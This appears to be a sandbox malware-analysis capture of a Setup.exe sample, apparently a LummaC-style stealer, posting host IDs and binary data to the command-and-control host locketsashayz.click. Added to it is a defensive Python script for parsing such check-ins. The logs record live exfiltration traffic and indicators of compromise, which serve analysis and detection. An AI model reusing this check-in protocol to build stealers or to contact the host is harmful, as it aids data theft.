Set-Cookie: PHPSESSID=9fvv2lbsh49d3l3flata0l9te3; expires=Sun, 27 Apr 2025 09:43:02 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5ZPYDxRodoLmDZnwIQlTEw%2FtYQNnhtlgyfOQULpe3oTzniqVCz7GemRCLIpbwVXNPC%2BlTbug%2BzCasWTldmohg6s16QITpR2CFFHymEIvm%2B1SFQVh80gCYlu82wgbruoMI7zhXQxZ"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fb3b2f5485572c2-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1794&min_rtt=1782&rtt_var=692&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=981&delivery_rate=1554018&cwnd=164&unsent_bytes=0&cid=d403ba37974b9e94&ts=482&x=0"
[chunked response body: encoded payload fragments not reproduced]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49732 | 188.114.97.3 | 443 | 6984 | C:\Users\user\Desktop\Setup.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-01 15:56:24 UTC | 275 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=GJEOV9UC
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 18102
Host: locketsashayz.click
2025-01-01 15:56:24 UTC | 15331 | OUT | Data Raw: 2d 2d 47 4a 45 4f 56 39 55 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 38 46 34 33 35 33 34 38 44 41 42 46 42 31 30 46 33 35 34 43 44 44 38 33 34 34 44 45 46 33 36 0d 0a 2d 2d 47 4a 45 4f 56 39 55 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 47 4a 45 4f 56 39 55 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 54 52 4f 4e 0d 0a 2d 2d 47 4a 45 4f 56 39 55 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69
Data Ascii: --GJEOV9UCContent-Disposition: form-data; name="hwid"48F435348DABFB10F354CDD8344DEF36--GJEOV9UCContent-Disposition: form-data; name="pid"2--GJEOV9UCContent-Disposition: form-data; name="lid"hRjzG3--TRON--GJEOV9UCContent-Dispositi
[binary multipart payload continuation not reproduced]
2025-01-01 15:56:25 UTC | 1140 | IN | HTTP/1.1 200 OK
Date: Wed, 01 Jan 2025 15:56:25 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=vuc22r8inqfb9lr4vfj4h19f10; expires=Sun, 27 Apr 2025 09:43:04 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jYFiK8T1d0QojdxTisg7jlq6rSUP11%2F%2FfKKDf%2BMB8Z%2FUo%2BiufZTYwUusb0T1ENzBv2%2FukOn%2FPMxqj6JvhtJumHE0BsB0TlIzgvScIChx2onFHacJIh%2FgNai1ep8c3bvWlDz%2BQwuT"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fb3b2fe483d0f80-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1480&min_rtt=1476&rtt_var=561&sent=9&recv=21&lost=0&retrans=0&sent_bytes=2847&recv_bytes=19057&delivery_rate=1935056&cwnd=207&unsent_bytes=0&cid=63870b80eb2718ea&ts=638&x=0"
2025-01-01 15:56:25 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2025-01-01 15:56:25 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49735 | 188.114.97.3 | 443 | 6984 | C:\Users\user\Desktop\Setup.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-01 15:56:25 UTC | 278 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=O6L9KZCKEJV7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8747
Host: locketsashayz.click
2025-01-01 15:56:25 UTC | 8747 | OUT | Data Raw: 2d 2d 4f 36 4c 39 4b 5a 43 4b 45 4a 56 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 38 46 34 33 35 33 34 38 44 41 42 46 42 31 30 46 33 35 34 43 44 44 38 33 34 34 44 45 46 33 36 0d 0a 2d 2d 4f 36 4c 39 4b 5a 43 4b 45 4a 56 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4f 36 4c 39 4b 5a 43 4b 45 4a 56 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 54 52 4f 4e 0d 0a 2d 2d 4f 36 4c 39 4b 5a 43 4b 45 4a 56 37 0d 0a 43
Data Ascii: --O6L9KZCKEJV7Content-Disposition: form-data; name="hwid"48F435348DABFB10F354CDD8344DEF36--O6L9KZCKEJV7Content-Disposition: form-data; name="pid"2--O6L9KZCKEJV7Content-Disposition: form-data; name="lid"hRjzG3--TRON--O6L9KZCKEJV7C
                                                                                                      2025-01-01 15:56:30 UTC1128INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 01 Jan 2025 15:56:30 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Set-Cookie: PHPSESSID=pt1lpvkpresq38vhh8l1mpsqmf; expires=Sun, 27 Apr 2025 09:43:09 GMT; Max-Age=9999999; path=/
                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      vary: accept-encoding
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9gu4gJ5LQY30NnDkjHITEQj5GwmvkTPm9fMGCBzLoKpcV%2BQBNdr8wq4nH3Q%2FpxglZRWwqHOGcemSnQ1ZejVzPK0XCDOrCboO5GtZF1d9Yv%2BygbUBHgcaFZo9D4hnC1AUBA0emcH0"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8fb3b3059f6542d5-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1670&min_rtt=1663&rtt_var=637&sent=6&recv=13&lost=0&retrans=0&sent_bytes=2846&recv_bytes=9683&delivery_rate=1698662&cwnd=221&unsent_bytes=0&cid=feae782e0792b40a&ts=4560&x=0"
                                                                                                      2025-01-01 15:56:30 UTC | 20 bytes | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                      Data Ascii (CR/LF restored from the raw bytes): f\r\nok 8.46.123.189\r\n (chunked transfer coding: chunk size 0xf, then the 15-byte chunk "ok 8.46.123.189"; the report's ASCII view drops the CR/LF bytes, which is why it reads "fok")
                                                                                                      2025-01-01 15:56:30 UTC | 5 bytes | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii (CR/LF restored from the raw bytes): 0\r\n\r\n (zero-length last chunk, end of body)


                                                                                                      Session ID: 4 | Source IP: 192.168.2.4 | Source Port: 49740 | Destination IP: 188.114.97.3 | Destination Port: 443 | PID: 6984 | Process: C:\Users\user\Desktop\Setup.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      2025-01-01 15:56:31 UTC | 277 bytes | OUT | POST /api HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: multipart/form-data; boundary=9MWOJXU86N
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                      Content-Length: 20388
                                                                                                      Host: locketsashayz.click
                                                                                                      2025-01-01 15:56:31 UTC | 15331 bytes | OUT | Data Raw: 2d 2d 39 4d 57 4f 4a 58 55 38 36 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 38 46 34 33 35 33 34 38 44 41 42 46 42 31 30 46 33 35 34 43 44 44 38 33 34 34 44 45 46 33 36 0d 0a 2d 2d 39 4d 57 4f 4a 58 55 38 36 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 39 4d 57 4f 4a 58 55 38 36 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 54 52 4f 4e 0d 0a 2d 2d 39 4d 57 4f 4a 58 55 38 36 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44
                                                                                                      Data Ascii (CR/LF restored from the raw bytes): --9MWOJXU86N\r\nContent-Disposition: form-data; name="hwid"\r\n\r\n48F435348DABFB10F354CDD8344DEF36\r\n--9MWOJXU86N\r\nContent-Disposition: form-data; name="pid"\r\n\r\n3\r\n--9MWOJXU86N\r\nContent-Disposition: form-data; name="lid"\r\n\r\nhRjzG3--TRON\r\n--9MWOJXU86N\r\nContent-D
                                                                                                      2025-01-01 15:56:31 UTC5057OUTData Raw: 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9b dc 40 f0 eb b1 64 f0 52 3c 78
                                                                                                      Data Ascii: lrQMn 64F6(X&7~`aO@dR<x
                                                                                                      2025-01-01 15:56:31 UTC | 1129 bytes | IN | HTTP/1.1 200 OK
                                                                                                      Date: Wed, 01 Jan 2025 15:56:31 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Set-Cookie: PHPSESSID=fj6gc7rmuj0bo6s2q969t39nup; expires=Sun, 27 Apr 2025 09:43:10 GMT; Max-Age=9999999; path=/
                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      vary: accept-encoding
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rmWms1awCgzFZEOPc4aLfz1N8pLdsD78utXCJEwir84f56597QRXNhIYFMFjStD1a%2FS6UqHQkcgJpBGbxPogJQE4DiP8zZrNXrq6%2BzrjwEwEzjliVkTmTZRhGeRyTl6IXCL%2B3Tbf"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8fb3b326794943dd-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1609&min_rtt=1604&rtt_var=611&sent=10&recv=25&lost=0&retrans=0&sent_bytes=2846&recv_bytes=21345&delivery_rate=1776155&cwnd=196&unsent_bytes=0&cid=89ad0635fd88321d&ts=656&x=0"
                                                                                                      2025-01-01 15:56:31 UTC | 20 bytes | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                      Data Ascii (CR/LF restored from the raw bytes): f\r\nok 8.46.123.189\r\n (one 0xf-byte chunk: "ok 8.46.123.189")
                                                                                                      2025-01-01 15:56:31 UTC | 5 bytes | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii (CR/LF restored from the raw bytes): 0\r\n\r\n (zero-length last chunk, end of body)


                                                                                                      Session ID: 5 | Source IP: 192.168.2.4 | Source Port: 49741 | Destination IP: 188.114.97.3 | Destination Port: 443 | PID: 6984 | Process: C:\Users\user\Desktop\Setup.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      2025-01-01 15:56:33 UTC | 277 bytes | OUT | POST /api HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: multipart/form-data; boundary=2W9N2HEFM8I
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                      Content-Length: 3779
                                                                                                      Host: locketsashayz.click
                                                                                                      2025-01-01 15:56:33 UTC | 3779 bytes | OUT | Data Raw: 2d 2d 32 57 39 4e 32 48 45 46 4d 38 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 38 46 34 33 35 33 34 38 44 41 42 46 42 31 30 46 33 35 34 43 44 44 38 33 34 34 44 45 46 33 36 0d 0a 2d 2d 32 57 39 4e 32 48 45 46 4d 38 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 32 57 39 4e 32 48 45 46 4d 38 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 54 52 4f 4e 0d 0a 2d 2d 32 57 39 4e 32 48 45 46 4d 38 49 0d 0a 43 6f 6e 74 65
                                                                                                      Data Ascii (CR/LF restored from the raw bytes): --2W9N2HEFM8I\r\nContent-Disposition: form-data; name="hwid"\r\n\r\n48F435348DABFB10F354CDD8344DEF36\r\n--2W9N2HEFM8I\r\nContent-Disposition: form-data; name="pid"\r\n\r\n1\r\n--2W9N2HEFM8I\r\nContent-Disposition: form-data; name="lid"\r\n\r\nhRjzG3--TRON\r\n--2W9N2HEFM8I\r\nConte
                                                                                                      2025-01-01 15:56:34 UTC | 1137 bytes | IN | HTTP/1.1 200 OK
                                                                                                      Date: Wed, 01 Jan 2025 15:56:34 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Set-Cookie: PHPSESSID=k0gdenaoun1a906759r87qjsol; expires=Sun, 27 Apr 2025 09:43:12 GMT; Max-Age=9999999; path=/
                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      vary: accept-encoding
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BT%2FiONL7uoVkLj4TNxisVEm5JbBtzTN6W3G3GY%2B01ZKiBbV37LzTXY8BU5PRYSpKgvciwoFy5f0pMYQmTTu7EbVtriM%2Fcaaf1njC%2F2AAH91P%2FcTMtRHyQ%2Bn8JowJYiW6K%2Bu9JNsb"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8fb3b333ea7c4368-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1606&min_rtt=1594&rtt_var=622&sent=5&recv=10&lost=0&retrans=0&sent_bytes=2845&recv_bytes=4692&delivery_rate=1723730&cwnd=233&unsent_bytes=0&cid=f7e83efd6be9c94d&ts=902&x=0"
                                                                                                      2025-01-01 15:56:34 UTC | 20 bytes | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                      Data Ascii (CR/LF restored from the raw bytes): f\r\nok 8.46.123.189\r\n (one 0xf-byte chunk: "ok 8.46.123.189")
                                                                                                      2025-01-01 15:56:34 UTC | 5 bytes | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii (CR/LF restored from the raw bytes): 0\r\n\r\n (zero-length last chunk, end of body)


                                                                                                      Session ID: 6 | Source IP: 192.168.2.4 | Source Port: 49742 | Destination IP: 188.114.97.3 | Destination Port: 443 | PID: 6984 | Process: C:\Users\user\Desktop\Setup.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      2025-01-01 15:56:34 UTC | 274 bytes | OUT | POST /api HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: multipart/form-data; boundary=8YUU28F3
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                      Content-Length: 1204
                                                                                                      Host: locketsashayz.click
                                                                                                      2025-01-01 15:56:34 UTC | 1204 bytes | OUT | Data Raw: 2d 2d 38 59 55 55 32 38 46 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 38 46 34 33 35 33 34 38 44 41 42 46 42 31 30 46 33 35 34 43 44 44 38 33 34 34 44 45 46 33 36 0d 0a 2d 2d 38 59 55 55 32 38 46 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 38 59 55 55 32 38 46 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 54 52 4f 4e 0d 0a 2d 2d 38 59 55 55 32 38 46 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69
                                                                                                      Data Ascii (CR/LF restored from the raw bytes): --8YUU28F3\r\nContent-Disposition: form-data; name="hwid"\r\n\r\n48F435348DABFB10F354CDD8344DEF36\r\n--8YUU28F3\r\nContent-Disposition: form-data; name="pid"\r\n\r\n1\r\n--8YUU28F3\r\nContent-Disposition: form-data; name="lid"\r\n\r\nhRjzG3--TRON\r\n--8YUU28F3\r\nContent-Dispositi
                                                                                                      2025-01-01 15:56:35 UTC | 1133 bytes | IN | HTTP/1.1 200 OK
                                                                                                      Date: Wed, 01 Jan 2025 15:56:35 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Set-Cookie: PHPSESSID=a083m6p4bao9eqdvrjnvnhdn9s; expires=Sun, 27 Apr 2025 09:43:14 GMT; Max-Age=9999999; path=/
                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      vary: accept-encoding
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9H%2F0bDub8aUd3qRG%2FmSy3HT6IrFulh8CJwB5L%2FL7M19WWbord9IqD0KXU7QcUSWQm9D5N994qhos7eOVBCJPHby%2FmlqI326%2FIlJYAnmqB5xwYwaaQk09wXl6xcI4A2nOCYBqRAfU"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8fb3b33dec00435e-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=33892&min_rtt=1843&rtt_var=19779&sent=7&recv=8&lost=0&retrans=0&sent_bytes=2845&recv_bytes=2114&delivery_rate=1584373&cwnd=240&unsent_bytes=0&cid=9501d7e8bb4c3951&ts=762&x=0"
                                                                                                      2025-01-01 15:56:35 UTC | 20 bytes | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                      Data Ascii (CR/LF restored from the raw bytes): f\r\nok 8.46.123.189\r\n (one 0xf-byte chunk: "ok 8.46.123.189")
                                                                                                      2025-01-01 15:56:35 UTC | 5 bytes | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii (CR/LF restored from the raw bytes): 0\r\n\r\n (zero-length last chunk, end of body)
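
The /api sessions above all have the same shape: a multipart/form-data POST to locketsashayz.click whose first three parts are named hwid, pid and lid, followed by binary data, answered with a chunked body of "ok 8.46.123.189". The Python below is an example added to this page for triage of such captures; it is not the sample's code and not part of the Joe Sandbox report. The request body is constructed from session 4's Data Ascii line with the CR/LF bytes restored, the response bytes are the two inbound Data Raw lines copied verbatim, and the closing "--boundary--" delimiter is an assumption, because the report truncates the body before it.

```python
"""Parse a LummaC-style /api check-in: multipart/form-data fields plus a
chunked "ok <ip>" reply. Example code written for this page; it is not the
sample's code and not part of the Joe Sandbox report."""
import binascii
import re

# Boundary taken from the session 4 Content-Type header in the report.
BOUNDARY = "9MWOJXU86N"

# Constructed sample: the printable prefix of the session 4 request body,
# rebuilt from the report's Data Ascii line with the CRLFs restored. The real
# body continued with roughly 20 KB of binary data that is not reproduced
# here, and the closing "--boundary--" delimiter is assumed (capture truncated).
SAMPLE_BODY = (
    b"--9MWOJXU86N\r\n"
    b'Content-Disposition: form-data; name="hwid"\r\n\r\n'
    b"48F435348DABFB10F354CDD8344DEF36\r\n"
    b"--9MWOJXU86N\r\n"
    b'Content-Disposition: form-data; name="pid"\r\n\r\n'
    b"3\r\n"
    b"--9MWOJXU86N\r\n"
    b'Content-Disposition: form-data; name="lid"\r\n\r\n'
    b"hRjzG3--TRON\r\n"
    b"--9MWOJXU86N--\r\n"
)

# The two inbound Data Raw lines of session 4, copied verbatim from the report.
RESPONSE_HEX = (
    "66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a "
    "30 0d 0a 0d 0a"
)


def hexdump_to_bytes(dump):
    """Turn a space-separated hex dump (as printed in the report) into bytes."""
    return binascii.unhexlify(dump.replace(" ", ""))


def parse_multipart(body, boundary):
    """Return {field name: raw value} for a multipart/form-data body (RFC 7578)."""
    delim = b"--" + boundary.encode()
    fields = {}
    for part in body.split(delim)[1:]:        # [0] is the preamble, empty here
        if part.startswith(b"--"):            # "--boundary--" closes the body
            break
        if part.startswith(b"\r\n"):          # CRLF that ends the delimiter line
            part = part[2:]
        headers, _, value = part.partition(b"\r\n\r\n")
        if value.endswith(b"\r\n"):           # CRLF that precedes the next delimiter
            value = value[:-2]
        match = re.search(rb'name="([^"]*)"', headers)
        if match:
            fields[match.group(1).decode()] = value
    return fields


def decode_chunked(data):
    """Decode an HTTP/1.1 chunked transfer-coded body (RFC 9112 section 7.1)."""
    out = bytearray()
    pos = 0
    while True:
        line_end = data.index(b"\r\n", pos)
        size_field = data[pos:line_end].split(b";", 1)[0]   # drop chunk extensions
        size = int(size_field, 16)
        pos = line_end + 2
        if size == 0:                         # last-chunk; trailers are ignored
            break
        out += data[pos:pos + size]
        pos += size + 2                       # skip the chunk data and its CRLF
    return bytes(out)


def summarize_checkin(body, boundary, response_hex):
    """One row of triage output: the identifying fields and the C2's reply."""
    fields = parse_multipart(body, boundary)
    reply = decode_chunked(hexdump_to_bytes(response_hex))
    return {
        "hwid": fields.get("hwid", b"").decode(errors="replace"),
        "pid": fields.get("pid", b"").decode(errors="replace"),
        "lid": fields.get("lid", b"").decode(errors="replace"),
        "reply": reply.decode(errors="replace"),
    }


if __name__ == "__main__":
    print(summarize_checkin(SAMPLE_BODY, BOUNDARY, RESPONSE_HEX))
```

Run against session 4 this yields hwid 48F435348DABFB10F354CDD8344DEF36, pid 3, lid hRjzG3--TRON and the reply "ok 8.46.123.189". Sessions 5 and 6 carry the same hwid and lid with pid 1, so the hwid/lid pair, together with the Host header and the "ok " reply prefix, is the practical pivot when searching other captures for check-ins of the same build.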


                                                                                                      Session ID: 7 | Source IP: 192.168.2.4 | Source Port: 49743 | Destination IP: 188.114.97.3 | Destination Port: 443 | PID: 6984 | Process: C:\Users\user\Desktop\Setup.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      2025-01-01 15:56:36 UTC | 276 bytes | OUT | POST /api HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: multipart/form-data; boundary=IALSNE3Y
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                      Content-Length: 549614
                                                                                                      Host: locketsashayz.click
